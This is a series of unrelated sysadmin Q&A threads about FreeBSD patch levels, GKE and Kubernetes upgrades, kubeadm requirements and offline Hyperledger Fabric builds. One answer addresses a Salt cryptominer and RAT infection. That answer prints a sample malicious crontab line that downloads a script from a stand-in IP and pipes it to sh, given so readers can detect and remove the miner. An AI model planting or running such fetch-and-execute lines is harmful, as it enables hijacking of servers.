I have one FreeBSD system reporting FreeBSD 11.1-RELEASE-p2 and another one reporting FreeBSD 11.1-RELEASE-p6.
What do the -p2 and -p6 parts of the version name stand for? Am I right in guessing that they stand for the patch level?
Is there a way to directly upgrade from FreeBSD 11.1-RELEASE-p2 to FreeBSD 11.1-RELEASE-p6 via
% freebsd-update upgrade -r 11.1-RELEASE-p6
Or how else would I do such a minor upgrade?
Correct. Your -p2 and -p6 stand for the different security patch levels of your systems. You cannot request a specific patch level with -r (that flag takes a release name); instead, the patch level is increased to the latest available by running:
freebsd-update fetch install # apply security patches
Talking about minor or major upgrades of FreeBSD: those are the "product versions", and this is where the -RELEASE part comes into play. It is always of the form [major version].[minor version]-RELEASE.
# minor upgrade if currently running 11.1-RELEASE, major release is still "11"
freebsd-update -r 11.2-RELEASE upgrade
# major upgrade if currently running e.g. 11.x-RELEASE
freebsd-update -r 12.0-RELEASE upgrade
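Note that a release upgrade is not finished by that single command. As a rough sketch of the full procedure described in the Handbook (11.2-RELEASE here is just an example target):
freebsd-update -r 11.2-RELEASE upgrade  # fetch and merge the new release
freebsd-update install                  # first pass: installs the new kernel
shutdown -r now                         # reboot into the new kernel
freebsd-update install                  # second pass: installs the new userland
# run 'freebsd-update install' again if prompted (e.g. after rebuilding ports)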
For more details see the FreeBSD Handbook/Updates.
Your current version and patch level of FreeBSD can be determined by running
freebsd-version -kru
# installed kernel, running kernel, userland
# those may differ from each other
# see 'man freebsd-version' for more
This is the patch level. You can roughly read the versions as 11.1.2 and 11.1.6, respectively. These versions usually differ only in security updates.
To install the latest security patches you can use freebsd-update fetch install.
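A minimal sketch of applying such a patch-level update and verifying the result afterwards (a reboot is only needed if the kernel itself was patched):
freebsd-update fetch      # download available security patches
freebsd-update install    # apply them
freebsd-version -kru      # confirm installed kernel, running kernel, userland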
We used to use salt-master to manage about 10 servers, but have stopped now.
One of the servers is now constantly running a salt-minions service which consumes around 140%-160% of the CPU all the time. I kill it, and it just comes back again and again.
I have used apt-get to remove and purge any packages matching salt-*, and used dpkg to do the same. The Salt master server is not running. Yet this instance just keeps getting hammered by this random process that won't die.
Any assistance is greatly appreciated!
Screenshot of running processes and output from apt-get packages
This looks to be CVE related, and you need to rebuild/redeploy these systems.
Please read both:
SaltStack Blog: Critical Vulnerabilities Update CVE-2020-11651 and CVE-2020-11652
saltexploit.com
Snippet from the CVE blog:
...a critical vulnerability was discovered affecting Salt Master versions 2019.2.3 and 3000.1 and earlier. SaltStack customers and Salt users who have followed fundamental internet security guidelines and best practices are not affected by this vulnerability. The vulnerability is easily exploitable if a Salt Master is exposed to the open internet.
As always, please follow our guidance and secure your Salt infrastructure with the best practices found in this guide: Hardening your Salt Environment.
This vulnerability has been rated as critical with a Common Vulnerability Scoring System (CVSS) score of 10.0.
Snippet from saltexploit:
This was a crypto-mining operation
salt minions are affected and as of version 5, masters may be as well
salt-minions is a compiled xmrig binary.
salt-store contains a RAT, nspps, which continues to evolve and become more nasty
Atlassian confirms the newer revisions of the binary are a version of h2miner
Additional information
As a RAT, salt-store is more concerning than salt-minions. More on that later
There have been at least 5 different versions of the salt-store payload, each more advanced than the last.
There are additional backdoors installed, and private keys are getting stolen right and left
Seriously, change out your keys!
Symptoms
very high CPU usage, sometimes only on 1 core, sometimes on all
Fan spin! (Physical hardware only, of course.)
Mysterious process named salt-minions is CPU intensive, stemming from /tmp/salt-minions or /usr/bin/
additional binary in /var/tmp/ or /usr/bin named salt-store or salt-storer
Firewalls disabled
Most applications crashing or taken offline
Your screenshot shows processes named salt-minions and high CPU usage, just as described.
It would be a good idea to join the Salt community Slack, too (SaltStack Community Slack), and take a look at both the #salt-store-miner-public and #security channels.
Check your root's crontab with:
sudo crontab -u root -l
If you see a wget/curl download of a shell script from a random IP, you've got the miner.
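Purely as a hypothetical illustration (the IP address, schedule, and script name below are invented, not taken from a real infection), such an entry is typically a periodic re-download of the dropper, which is why the process keeps coming back:
*/2 * * * * wget -q -O - http://203.0.113.7/sa.sh | sh > /dev/null 2>&1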
How to fix it:
Plan A:
Update the Salt master
Wipe and reinstall all the servers connected to that master.
Plan B (usually more feasible):
Update the Salt master and minions
Delete the malicious crontab entry with sudo crontab -u root -e
Kill the salt-store and salt-minions processes with kill -9 <pid> <pid> (get the PIDs with ps faxu)
Delete the fake salt-minions executable, usually found in /tmp/ (see the sketch below)
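A minimal shell sketch of Plan B's cleanup, assuming the binaries sit in the locations listed under Symptoms above (adjust the paths to whatever you actually find):
sudo crontab -u root -e        # remove the wget/curl line by hand
sudo pkill -9 -x salt-store    # kill the RAT
sudo pkill -9 -x salt-minions  # kill the miner
sudo rm -f /tmp/salt-minions /var/tmp/salt-store /usr/bin/salt-store /usr/bin/salt-storer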
I formed a k8s cluster with 5 nodes.
I want to run a command on all nodes, which would be equivalent to:
k8s-node1: yum update
k8s-node2: yum update
k8s-node3: yum update
k8s-node4: yum update
k8s-node5: yum update
How to achieve this?
As cookiedough mentioned, your question is not Kubernetes-related but rather about Linux server administration; in this case it also should not be asked on Stack Overflow, as that site is for programming-related topics.
You will find that this question has already been asked and answered here, as have similar cases where there is a need to run a command or an update on multiple machines.
To keep it short: you can use lots of tools such as Ansible, pssh, or a simple script (see the sketch below).
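For instance, a minimal sketch assuming key-based SSH access as root and the node names from your question:
# plain shell loop over the five nodes
for node in k8s-node1 k8s-node2 k8s-node3 k8s-node4 k8s-node5; do
  ssh "root@$node" 'yum -y update'
done
# or the same with pssh, reading the node names from a file
pssh -h nodes.txt -l root -i 'yum -y update'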
In case there are existing pods on the node and you have a specific need to reboot it (for example a kernel upgrade, libc upgrade, etc.), you can read about this scenario in the official documentation - Maintenance on a Node.
We have a fairly large kubernetes deployment on GKE, and we wanted to make our life a little easier by enabling auto-upgrades. The documentation on the topic tells you how to enable it, but not how it actually works.
We enabled the feature on a test cluster, but no nodes were ever upgraded (although the UI kept nagging us that "upgrades are available").
The docs say it would be updated to the "latest stable" version and that it occurs "at regular intervals at the discretion of the GKE team" - neither of which is terribly helpful.
The UI always says: "Next auto-upgrade: Not scheduled"
Has someone used this feature in production and can shed some light on what it'll actually do?
What I did:
I enabled the feature on the nodepools (not the cluster itself)
I set up a maintenance window
Cluster version was 1.11.7-gke.3
Nodepools had version 1.11.5-gke.X
The newest available version was 1.11.7-gke.6
What I expected:
The nodepool would be updated to either 1.11.7-gke.3 (the default cluster version) or 1.11.7-gke.6 (the most recent version)
The update would happen in the next maintenance window
The update would otherwise work like a "manual" update
What actually happened:
Nothing
The nodepools remained on 1.11.5-gke.X for more than a week
My question
Is the nodepool version supposed to update?
If so, at what time?
If so, to what version?
I'll finally answer this myself. The auto-upgrade does work, though it took several days to a week until the version was upgraded.
There is no indication of the planned upgrade date, or any feedback other than the version updating.
It will upgrade to the current master version of the cluster.
Addition: It still doesn't work reliably, and there is still no way to debug it when it doesn't. One piece of information I got was that the mechanism does not work if you initially specified an explicit version for the node pool. As it is not possible to deduce the inner workings of the auto-upgrades, we had to resort to manually checking the status again (see the sketch below).
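For reference, the manual check itself is simple; a sketch with a placeholder cluster name and zone:
gcloud container clusters describe my-cluster --zone us-central1-a --format="value(currentMasterVersion)"
gcloud container node-pools list --cluster my-cluster --zone us-central1-a --format="table(name,version)"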
I wanted to share two other possibilities as to why a node-pool may not be auto-upgrading or scheduled to upgrade.
One of our projects was having a similar issue where the master version had auto-upgraded to 1.14.10-gke.27 but our node-pool stayed stuck at 1.14.10-gke.24 for over a month.
Reaching a node quota
The node-pool upgrade might be failing due to a node quota (although I'm not sure the web console would say Next auto-upgrade: Not scheduled). From the node upgrades documentation, it suggests we can run the following to view any failed upgrade operations:
gcloud container operations list --filter="STATUS=DONE AND TYPE=UPGRADE_NODES AND targetLink:https://container.googleapis.com/v1/projects/[PROJECT_ID]/zones/[ZONE]/clusters/[CLUSTER_NAME]"
Automatic node upgrades are for minor+ versions only
After exhausting my troubleshooting steps, I reached out to GCP Support and opened a case (Case 23113272 for anyone working at Google). They told me the following:
Automatic node upgrade:
The node version does not necessarily upgrade automatically. Let me explain: there are three kinds of upgrades for a node: minor versions (1.X), patch releases (1.X.Y), and security updates and bug fixes (1.X.Y-gke.N). Please take a look at this documentation [2]. The automatic node upgrade works from a minor version onward, and in your case the upgrade was a security update, which can't be applied automatically.
I responded, and they confirmed that automatic node upgrades will only happen for minor versions and above. I have requested that they submit a request to update their documentation because (at the time of this response) this is not outlined anywhere in their node auto-upgrade documentation.
This feature replaces the VMs (Kubernetes nodes) in your node pool running the "old" Kubernetes version with VMs running the "new" version.
The node pool "upgrade" operation is done in a rolling fashion: It's not like GKE deletes all your VMs and recreates them simultaneously (except when you have only 1 node in your cluster). By default, the nodes are replaced with newer nodes one-by-one (although this might change).
GKE internally uses mostly the features of managed instance groups to manage operations on node pools.
You can find documentation on how to schedule node upgrades by specifying certain "maintenance windows" so you are impacted minimally. (This article also gives a bit more insights on how upgrades happen.)
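For illustration, configuring such a window looked like this at the time (the cluster name and start time are placeholders; the flag sets the start of a daily four-hour window in UTC):
gcloud container clusters update my-cluster --maintenance-window=03:00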
That said, you can disable auto-upgrades and upgrade your cluster manually (although this is not recommended). Some GKE users have thousands of nodes, so for them upgrading VMs one by one is not feasible.
For that, GKE offers an option that lets you choose how many nodes are upgraded at a time:
gcloud container clusters upgrade \
--concurrent-node-count=CONCURRENT_NODE_COUNT
Documentation of this flag says:
The number of nodes to upgrade concurrently. Valid values are [1, 20]. It is a recommended best practice to set this value to no higher than 3% of your cluster size.
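A full invocation also names the cluster and, optionally, the node pool; a sketch with placeholder names:
gcloud container clusters upgrade my-cluster --node-pool=my-pool --zone=us-central1-a --concurrent-node-count=3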
Is it possible to install Kubernetes with the kubeadm init command on a system that has less than 1 GB of RAM? I have tried, but the installation failed at the kubeadm init step.
As mentioned in the installation steps to be taken before you begin, you need to have:
a Linux-compatible system for the master and nodes
2 GB or more of RAM per machine
network connectivity
swap disabled on every node
But going back to your question: it may be possible to run the installation process, but the cluster will not be usable afterwards. This configuration will not be stable (see the sketch below for how kubeadm's checks come into play).
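For completeness: kubeadm enforces these requirements as preflight checks, and the only way an under-provisioned machine gets past kubeadm init at all is to skip them explicitly. This is a sketch of the override, not a recommendation:
kubeadm init --ignore-preflight-errors=NumCPU,Mem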
Is there any way we can get the Hyperledger Fabric binaries, or build them from the source code, as our machines are behind firewalls? I am not able to run
curl -sSL goo.gl/byy2Qj | bash -s 1.0.5
which uses the following commands:
docker pull hyperledger/fabric-$IMAGES:$FABRIC_TAG
docker tag hyperledger/fabric-$IMAGES:$FABRIC_TAG hyperledger/fabric-$IMAGES
Docker Hub is blocked and external images are not allowed to be downloaded.
I believe this is an issue for most enterprises whose systems sit behind firewalls and are given restricted access to Docker as well.
Download the binaries for the orderer and peers (and configtx, etc.) directly, using this line from the script at goo.gl/byy2Qj. Browse manually to find your flavor and release.
echo "===> Downloading platform binaries"
curl https://nexus.hyperledger.org/content/repositories/releases/org/hyperledger/fabric/hyperledger-fabric/${ARCH}-${VERSION}/hyperledger-fabric-${ARCH}-${VERSION}.tar.gz | tar xz
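For example, with the variables filled in for a 64-bit Linux machine and the 1.0.5 release from your snippet (the platform string may differ on your system):
curl https://nexus.hyperledger.org/content/repositories/releases/org/hyperledger/fabric/hyperledger-fabric/linux-amd64-1.0.5/hyperledger-fabric-linux-amd64-1.0.5.tar.gz | tar xz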
You may still have to clone and install the CA server, and install CouchDB, Postgres, Kafka, Zookeeper, etc., depending on how you want to set things up.
And you can always clone the main Fabric repo and make the binaries yourself.
You can then run them without Docker (note: the chaincode container needs Docker available, but no images) or modify the Docker scripts and create your own containers.
This page in the docs gives some good clues if you want to build them yourself. You really only need to make peer and orderer, but you can run make dist-clean all. Making all can take 45 minutes to an hour. You don't have to make or run any of the tests. And don't use Vagrant.
https://hyperledger-fabric.readthedocs.io/en/release/dev-setup/build.html
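A minimal sketch of building just those two binaries from a source checkout (assumes Go and the other prerequisites from that page are already installed):
git clone https://github.com/hyperledger/fabric.git
cd fabric
make peer orderer  # the binaries end up under the build output directory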